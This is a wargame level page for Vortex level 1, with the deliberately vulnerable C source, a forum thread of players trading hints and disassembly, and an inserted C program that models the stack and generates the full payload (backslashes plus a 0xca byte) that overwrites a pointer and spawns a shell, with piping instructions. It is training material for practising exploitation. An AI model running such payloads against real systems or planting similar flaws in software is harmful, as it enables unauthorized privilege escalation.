Vortex Level 1

Canary Values

We are looking for a specific value in ptr. You may need to consider how bash handles EOF.

Reading Material: Smashing the Stack for Fun and Profit

Source Code: level1.c :

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }

void print(unsigned char *buf, int len)
{
        int i;

        printf("[ ");
        for(i=0; i < len; i++) printf("%x ", buf[i]);
        printf(" ]\n");
}

int main()
{
        unsigned char buf[512];
        unsigned char *ptr = buf + (sizeof(buf)/2);
        unsigned int x;

        while((x = getchar()) != EOF) {
                switch(x) {
                        case '\n': print(buf, sizeof(buf)); continue; break;
                        case '\\': ptr--; break;
                        default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
                }
        }
        printf("All done\n");
}
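The level's loop has one write primitive (a byte store through ptr, followed by ptr++) and one unbounded move (ptr-- on every backslash; only the upper bound is ever checked). The following program is an added example, not the level's code or any poster's: it models the level1 frame in user space, walks ptr below buf with backslashes, and shows why the byte store can reach ptr's own top byte, and why a build that caches the old ptr in a register across the store (the gcc 4.2 listing quoted further down the thread) undoes it. Assumptions, not taken from the page: ptr sits directly below buf, as in the gcc 3.4 listing (ptr at -0x20c(%ebp), buf right above it); BUF_ADDR is an arbitrary stand-in for buf's real stack address; the payload layout and the helper names are mine.

```c
/* Added example (not the level's code or any poster's): a user-space model of
 * the level1 frame.  Assumptions: ptr lies directly below buf, as in the
 * gcc 3.4 listing (ptr at -0x20c(%ebp), buf right above it); BUF_ADDR is an
 * arbitrary stand-in for buf's real stack address. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN  512
#define NBACK    257            /* '\\' count: walks ptr from buf+256 to buf-1 */
#define BUF_ADDR 0xbffff200u    /* assumed 32-bit address of buf */

enum outcome { OUT_ALL_DONE, OUT_SHELL, OUT_BAD_WRITE };

/* ptr is kept as explicit little-endian bytes so buf[-1] is its top byte on
 * any host; both members have alignment 1, so there is no padding. */
struct frame {
    unsigned char ptr_le[4];
    unsigned char buf[BUF_LEN];
};

static uint32_t load_ptr(const struct frame *f)
{
    return (uint32_t)f->ptr_le[0] | (uint32_t)f->ptr_le[1] << 8 |
           (uint32_t)f->ptr_le[2] << 16 | (uint32_t)f->ptr_le[3] << 24;
}

static void store_ptr(struct frame *f, uint32_t v)
{
    for (int i = 0; i < 4; i++) f->ptr_le[i] = (v >> (8 * i)) & 0xff;
}

/* Map a modelled address onto the frame; NULL if the write would land outside
 * the modelled bytes (the real binary would corrupt whatever lives there). */
static unsigned char *frame_byte(struct frame *f, uint32_t addr)
{
    uint32_t lo = BUF_ADDR - 4;                       /* address of ptr */
    if (addr < lo || addr >= BUF_ADDR + BUF_LEN) return NULL;
    return (unsigned char *)f + (addr - lo);
}

/* level1's loop over an input string.  inc_in_memory = 1 models the gcc 3.4
 * build ("incl (%eax)": ptr re-read from the stack after the byte store);
 * 0 models the gcc 4.2 listing, which keeps the old ptr in edx and stores
 * edx+1 back, discarding whatever the byte store did to ptr. */
static enum outcome run_level1(const unsigned char *in, size_t n, int inc_in_memory)
{
    struct frame f;
    memset(f.buf, 0, sizeof f.buf);
    store_ptr(&f, BUF_ADDR + BUF_LEN / 2);           /* ptr = buf + sizeof(buf)/2 */

    for (size_t i = 0; i < n; i++) {
        unsigned char x = in[i];
        uint32_t ptr = load_ptr(&f);
        if (x == '\n') continue;                      /* print(): no state change */
        if (x == '\\') { store_ptr(&f, ptr - 1); continue; }

        if ((ptr & 0xff000000u) == 0xca000000u)       /* e(): the target condition */
            return OUT_SHELL;
        if (ptr > BUF_ADDR + BUF_LEN) continue;       /* only the upper bound is checked */

        unsigned char *dst = frame_byte(&f, ptr);
        if (!dst) return OUT_BAD_WRITE;
        *dst = x;                                     /* ptr[0] = x; may hit ptr itself */
        store_ptr(&f, (inc_in_memory ? load_ptr(&f) : ptr) + 1);
    }
    return OUT_ALL_DONE;
}

/* 257 backslashes, the 0xca that becomes ptr's top byte, and one more byte so
 * e() runs against the new value.  Returns the length, 0 if out is too small. */
static size_t build_payload(unsigned char *out, size_t cap)
{
    if (cap < NBACK + 2) return 0;
    memset(out, '\\', NBACK);
    out[NBACK] = 0xca;
    out[NBACK + 1] = 'A';
    return NBACK + 2;
}

static enum outcome payload_outcome(int inc_in_memory)
{
    unsigned char p[NBACK + 2];
    return run_level1(p, build_payload(p, sizeof p), inc_in_memory);
}

int main(void)
{
    unsigned char p[NBACK + 2];
    size_t n = build_payload(p, sizeof p);
    /* Raw bytes to stdout: a terminal turns a typed Ê into UTF-8 c3 8a, so the
     * 0xca must come from a program, e.g. (./gen; cat) | /vortex/level1, where
     * cat keeps stdin open so the spawned sh does not read EOF immediately. */
    fwrite(p, 1, n, stdout);
    fprintf(stderr, "gcc 3.4 model: %s\n", run_level1(p, n, 1) == OUT_SHELL ? "shell" : "no shell");
    fprintf(stderr, "gcc 4.2 model: %s\n", run_level1(p, n, 0) == OUT_SHELL ? "shell" : "no shell");
    return 0;
}
```

Two details the model makes visible. First, the trigger is not the 0xca write itself: e() runs before each store, so one more byte has to arrive after ptr's top byte has been changed. Second, the spawned sh inherits the level's stdin; if that stdin is a finished pipe or redirected file, sh reads EOF and exits at once, which is the "sh-3.2$ exit" behaviour reported in the thread and the reason the level text points at EOF handling.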

Ack! I just solved it!

Shouts to whoever created these wargames, because I learned a lot.

You know what took me so long to solve it? Let's just say that if I were to eat a stack of pancakes, I would put the syrup down first and then lay down the pancakes. ;)

Plus all that stuff about terminal emulators converting my magic character into two bytes. I don't really understand that, but oh well.

Next steps

So I got my shell, but I'm not sure what to do with it. Is there a password I'm supposed to get? How?

read MOTD carefully

I did, but the fact remains

I did, but the fact remains that I still have the vortex1 uid, and so I don't have permission to get at the next level's password. I even tried hard-coding the uid of vortex2, but when the shell opens, I'm still vortex1. Although I don't even know if that's supposed to work - I'm pretty noob at this.

EDIT: Oh wait, n/m. I hadn't realized that the scratch space directory wasn't the intended escalation path. *facepalm*

To obtain answers quickly,

To obtain answers quickly, join irc.pulltheplug.org channel #vortex

So long, and thanks for all the fish!

Login Error

I got the username and password from level 0. I enter them, but it seems it will not accept my password. I have entered them multiple times, checking for case as well, but to no avail.
After 3 times I get
Permission denied (publickey,keyboard-interactive)

I tried it from a different computer and it works from there. Maybe I entered the username wrong the first time by accident. How do I re-enter my username? It does not ask me for it when I try again.

Any ideas.

Re: Login Error

Just watch the level0 video and see what you are doing wrong.

So long, and thanks for all the fish!

I'm on vortex1, and there

I'm on vortex1, and there doesn't seem to be any problem to solve. Is the puzzle supposed to be in the /home/vortex/vortex1 directory or what?

Read the welcome screen. It

Read the welcome screen. It says:
Vortex information can be found in /vortex. Additional information on
Vortex can be found in /vortex/README

So long, and thanks for all the fish!

Help: noob question

The first level was OK; this one I am having a little trouble with. Just a beginner question, really: is there anywhere that we have write permission, so that we can save this code and compile it? I can log in to vortex, but when I copy the source and try to save it, the /tmp folder and the /var/tmp folder are restricted, and I haven't come across a folder with write access. It is probably something simple that I am overlooking. Any help would be great.

Create a directory in /tmp

Create a directory in /tmp with a hard to guess name.
You are denied listing the content of /tmp - but you can make your own dir there.

mkdir /tmp/thenameyoulike

In this dir you'll have full write-access. Since listing the content of /tmp is forbidden, you can save your progress in your dir.
Just don't forget the name of it.

darkelf

Some tiny help please :-)

Hi there,

I'm somewhat stuck with this level. I thought it would be an easy task, but now I'm losing lots of hair while working on it.
I hope I don't reveal too much by saying that I tried to exploit the "ptr--;" and "ptr++[0] = x;" part.
I lowered the ptr-value so that it points to itself and overwrote the MSB with 0xca. So far, so good I thought - but actually it was not.
The reason is, that before I write the new value to ptr, the original value is stored in EDX and will be restored after the change.
See here:

0x80485e7  mov    edx,DWORD PTR [ebp-0x214]   # load the value of ptr into edx
0x80485ed  mov    eax,DWORD PTR [ebp-0x10]    # load the value of x into eax
0x80485f0  mov    BYTE PTR [edx],al           # store the x value where ptr is pointing
0x80485f2  lea    eax,[edx+0x1]               # load the original ptr value + 1 into eax
0x80485f5  mov    DWORD PTR [ebp-0x214],eax   # the value of ptr is restored (+1); the change is gone :(

Since I don't know, how to circumvent that behavior, I want to ask if I'm on the right track anyway.
Any help is most appreciated.

Thanks a lot in advance.

darkelf.

P.S. a forum would be useful :-)

Try to read your 5 lines a

Try to read your 5 lines a couple more times... What's being restored, and do you actually need it?

So long, and thanks for all the fish!

Edited:

Oops!
Where did you get that asm code? I see a completely different /vortex/level1 code snippet:
0x0804854e : mov -0x20c(%ebp),%eax // ptr
0x08048554 : mov %eax,%edx // keep ptr
0x08048556 : mov -0x210(%ebp),%al // x value
0x0804855c : mov %al,(%edx) // ptr[0] = x
0x0804855e : lea -0x20c(%ebp),%eax // &ptr
0x08048564 : incl (%eax) // ptr++

First of all, thanks a lot

First of all, thanks a lot for your help.

The asm code is taken straight out of gdb.
My gdb is set (via .gdbinit) to show asm code in Intel syntax, because I dislike AT&T syntax (I find it harder to read).
I copied the source code above and compiled it with gcc (version 4.2.3) on a Debian box.
The two snippets are pretty alike but not equal. I don't know so far if this is the problem.
I will compile the source again - this time on vortex.

Again, thank you. I'm pretty sure it wasn't my last question.

darkelf

\\\\\\\\\\\\\\\\...
edit:
strange thing! It seems that it was really a compiler issue. I compiled the source on vortex, which has gcc 3.4.6 and my string worked out of the box. Happy me :-)

Congrats! See you at level 9

Congrats! See you at level 9, where I'm stuck completely blind :( I can't even find a problem to solve...

So long, and thanks for all the fish!

Thanks.

Thanks.
I will hurry up to meet you there ;-)
I'm currently working on level 3. lev2 was really not that complicated.
I like this game. Since I was mainly in RCE-stuff before, I have to read lots of papers now to get into this.

See ya.

darkelf

wtf??

Hello!

I think I exploited the level, but this is what I get:

sh-3.2$ exit

I can get the shell, but I can't use it; the shell prompt just "exit()s" :-P

wtf is this?

I faced the similar problem

I faced a similar problem at level 1. Input redirection didn't work for me, so I just ran /vortex/level1 and then copy-pasted the required string.

So long, and thanks for all the fish!

copypaste not working :-S

Yeah,

my shell always exit()'s, and copy-paste doesn't work for me... soooo I think I've got a problem!

So strange, this /bin/sh behaviour!

Can anyone figure this out?

thx

Try it in rxvt

I had the same problem. I couldn't convince my terminal to send the character I pasted - it was always escaped to 2 bytes (c3 8a). I was able to run the exploit by piping my input to stdin, but telling bash to ignore eof didn't stop the shell exiting immediately.

gnome-terminal and xterm both failed to paste my input as-is, so I tried rxvt and _finally_ got this to work.

Hmmm! Can I see your string?

Hmmm!
Can I see your string? email it to beeblbrx^mail.ru

(replace ^)
So long, and thanks for all the fish!

I'm unable to connect to the ssh :(

I'm trying to connect to 69.55.233.89 using PuTTY.
When I type the username and password that I got from level 0, the terminal session gets stuck (when I press Enter, nothing is printed out).
And when I try to reconnect, I don't even get a chance to type a username and password (after a few hours it's fixed).

Am I doing something wrong? or is there a bug in the server out there?

I blame the server

Mate, you're getting further than me. When I try connecting I get a blank screen for a while and then PuTTY says that the server closed the connection, I don't even get offered the chance to try a username/password.

**Groupies Required**

Damn those servers

Always trying to fail us!

hex character

What character do I need to type to get a 0xca? I've looked everywhere and all I can find is Ê, but when I type it, it is not 0xca but 0xc3 0x8a.

Read the code again

You are missing something :)

what file to exploit?

I think I know how to exploit this program, and I also connected to vortex1@vor......
but I see nothing to exploit???

Also, ptr++[0]=x in my compiler compiles to something like this: s=ptr+1; ptr[0]=x; ptr=s;
--
There are 10 types of people in the world: those that know binary and those that don't.

Compile error

bt VORTEX # gcc 1.c -o level1
1.c:8: error: expected identifier or '(' before 'if'
1.c:38:2: warning: no newline at end of file

I'm a newbie at C, but I think there is something wrong with that define syntax thing.

Compile error

It appears it wasn't pasted into the form correctly, I'll edit it and update it.

Thanks :)